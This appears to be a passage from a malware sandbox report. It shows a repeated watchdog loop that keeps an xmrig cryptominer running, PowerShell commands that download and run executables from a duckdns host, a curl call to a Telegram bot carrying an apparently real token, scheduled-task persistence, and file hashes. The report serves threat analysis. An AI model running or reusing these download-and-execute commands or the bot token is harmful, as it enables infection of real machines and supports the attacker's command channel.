        Suspicious use of AdjustPrivilegeToken
        
        PID:3524
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2608
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3900
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4848
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2332
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4960
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:780
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:500
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2028
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:3988
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:1572
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3608
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3492
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:3124
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3328
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2980
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1060
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1536
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2552
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4720
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5112
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4904
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1212
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:5072
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1948
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4952
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:3000
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4436
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3988
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4400
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1928
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3540
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4908
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4232
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2980
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3704
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2180
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5112
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2292
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3472
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:1648
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1456
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2340
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:500
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4064
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3912
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:444
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4056
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4400
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2032
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2668
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:3508
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:1696
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2344
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2372
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2868
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4896
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1836
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1068
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4308
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:116
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5112
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3100
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1716
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:5000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:1948
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:2600
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:2528
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4820
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:5096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2816
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:4932
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:3676
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:640
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2108
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:5072
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:3020
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4928
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:5096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4540
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:1912
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:4864
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:880
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4056
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:780
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:2504
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:868
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:1696
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:264
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:1560
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2460
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2668
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:1136
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:3960
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4360
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3212
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:5112
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\1.exe'; C:\Users\Admin\AppData\Roaming\1.exe"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3912
    - - C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2528
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\tmp.vbs
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1432
        
        C:\Users\Admin\AppData\Local\Temp\tmp.vbs
        
        C:\Users\Admin\AppData\Local\Temp\tmp.vbs
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:4516
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ping.vbs"
        8⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\ping.bat" "
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:1692
        
        C:\Windows\system32\curl.exe
        
        curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success"
        10⤵
        
        PID:3172
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\2.exe'; C:\Users\Admin\AppData\Roaming\2.exe"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:444
    - - C:\Users\Admin\AppData\Roaming\2.exe
        
        "C:\Users\Admin\AppData\Roaming\2.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1064
      - C:\Users\Admin\AppData\Roaming\XenoManager\2.exe
        
        "C:\Users\Admin\AppData\Roaming\XenoManager\2.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4752
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /Create /TN "Fobus.exe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp30DA.tmp" /F
        7⤵
        Creates scheduled task(s)
        
        PID:2196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/6nif5f8r/address.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\5.exe'; C:\Users\Admin\AppData\Roaming\5.exe"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4312
    - - C:\Users\Admin\AppData\Roaming\5.exe
        
        "C:\Users\Admin\AppData\Roaming\5.exe"
        5⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        
        PID:5040
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /tn AccSys /tr "C:\Users\Admin\AppData\Roaming\ACCApi\apihost.exe" /st 09:31 /du 23:59 /sc daily /ri 1 /f
        6⤵
        Creates scheduled task(s)
        
        PID:3068
      - C:\Users\Admin\AppData\Roaming\ACCApi\apihost.exe
        
        "C:\Users\Admin\AppData\Roaming\ACCApi\apihost.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: AddClipboardFormatListener
        
        PID:1216
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF514.tmp.cmd""
        6⤵
        
        PID:684
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 6
        7⤵
        Delays execution with timeout.exe
        
        PID:3704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/g0nv8z1z/creal.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\4.exe'; C:\Users\Admin\AppData\Roaming\4.exe"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      PID:1448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4188 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
1⤵
PID:2568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Drivers\1.vbs

Filesize
124B

MD5
b9e042cfa6eef8d1417bd08d37c35ee6

SHA1
2d18e819b7d08a893f659f2a906c295151610033

SHA256
f3b5e5c34a2cc93d9f1e6697793773be88c94925eb33172135760c4eb31f1309

SHA512
19d7f2618aaedd0f73c85e877402809d656f792a0cdc06396e4fb91600a08b2868f103e9ee12bba3123042e409a64750f17e13e249011021f4b1a1a00ba81177

Download Submit
C:\ProgramData\Drivers\process.bat

Filesize
170B

MD5
d89fff619cf786f0d205da967252217d

SHA1
1e1fe734cfd4c7a2106939cc0c54b8edcbce634d

SHA256
0a6177773973e20c2fd37e720dfa871c1346f004e1a31031a4c128753a8c7f79

SHA512
713b0bd698f476371b15cab7a6db3ad8bfbe79e4b27ab513ceafb120052100b6ef778fbf9e36c00e6464c5dfe0e6beee84438c72e47b61b4e71047d48960c768

Download Submit
C:\ProgramData\Drivers\watch.bat

Filesize
466B

MD5
268c0175b9b71f4528ced7294c0fd4e6

SHA1
d03c02f09c765bf0cc7de2e8f0262506258e7147

SHA256
ca1707608c5b5bc49a0d32d5479582bd02a0f6f1f4aa721b937616ac6ed61ccd

SHA512
37e25dbeb3f70dff3ae76e4d7f22c8bcbb9f7ab7fc181e0e6c1034301124d2106e4d11747de131c99ba0b12591fff9aa3fcc59fc25de855ed18a6da8931d26c2

Download Submit
C:\ProgramData\Drivers\winproc.vbs

Filesize
122B

MD5
a82c25e15e702ca491638865158efd61

SHA1
5fdbd3220fa1577d95e9382d0a921c3a43c1ab81

SHA256
5aa3c22d03de9b802bb7b6e778e78e9b2aa203b898970c47ec9624899c76514a

SHA512
af0fb0d68dc8f119e48810e9e5668e4a971b3b0ca116147ea5b3868548d0df97e77a14f7bb3d78601ae758b5915820f2ecd2d4c7d9c401b4d28fad3373a03354

Download Submit
C:\ProgramData\Drivers\xmrig.exe

Filesize
7.9MB

MD5
0b021b93052fed386a4d094edae61ca8

SHA1
5b6a58cbe268db9128ab683a29d2b9a856d3588b

SHA256
0510f1e57b0bc5967a8b658cea729948219d578b6c9b3a036ff33b4a6a46e495

SHA512
93b9d43635ba6d768a5285dd0d95eb54fed05f3aaf0e41ff67016773b680373770cb1736e0a3ff5c37f8737531fe313be642b20ccfa0a1ad46dc903cd0c62ae6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
51e9ab2ae2e932bec25ae3649879204a

SHA1
d7267498b5ad1dc91cf3539545c92daab9264a7a

SHA256
5c174fffc63ffea5c6dce243b26ee24b9be810417ae7c69b010bb7534e0aa60e

SHA512
6b5ace724e980c907d7c0127f7ec1bd51e3644f5b19948424db799463fef505ae6bd6aecb5ff7bfa3339929a76dbbadba0d3ba8b9d095974564dd3df1fe22259

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8582f47b5b1ab4a2ed417315a4b1a437

SHA1
5b2ce373e9fc77d00384a2184e809384b2888bba

SHA256
30f7c84b7f94195fcc4f844c77da88f22b1a58a4538a6a8877c3f3f435ad0f7c

SHA512
297d648cd182ccc2d9b3ef525f230d4b5a3c244275c26a5c5012aa8d27e30c817b1dde38174b52bf8c21b51f33b4fc030530207aa166847784f67780ccbde587

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
08f9f3eb63ff567d1ee2a25e9bbf18f0

SHA1
6bf06056d1bb14c183490caf950e29ac9d73643a

SHA256
82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

SHA512
425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2c1e02f5a87d9cd59f95ed0011337412

SHA1
5af823387ce2384a4b32c66a4e0d9afc63bdd8f2

SHA256
afc0a6ac77b7855ec237d28ed2431d5e79fcf110d146b4c34f4d9f555c3da530

SHA512
c358ffa2e59c2e82267b3acf58d737f345bb0ecd671e1f34bcef72f80dbb4c7b746f5422d6eccd215a08aca0375879c980f70165da335808ccfdce2d3a0005fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ping.bat

Filesize
125B

MD5
d570d0e8e5cba465ed8dbf39b49e96b9

SHA1
9fee7d75e32a88326d51b79d282d55ee74df63ed

SHA256
2374afd5f860e8eff24bb072284054d45d8625eb2a8837ecd83869925760ea50

SHA512
d3d99e2290992b9073751a53f11187b86833778e2920136dc0fe644d4b0891f3df484cf165cf87dbe1f898c57760500596e1133f8ed3a8d629a7a8355e27650b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ping.vbs

Filesize
121B

MD5
69d21d90d16b7a1a89699696ea892799

SHA1
2f6a6701310c85e52920ad3d972e5fb85ce64b9a

SHA256
278af8bb4a00d8a8cddd66ec207f65665389d13e4fe32b442fb70a2d8c65318a

SHA512
315a460f2d05abaea058c291f52592d802dafcc13ffbeca49d210908a5f6c00bba1d0b8451e59c249005811bfc38a6983a6a13c9161f3705ba63d6608e3ce510

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lkcm0fja.wxs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
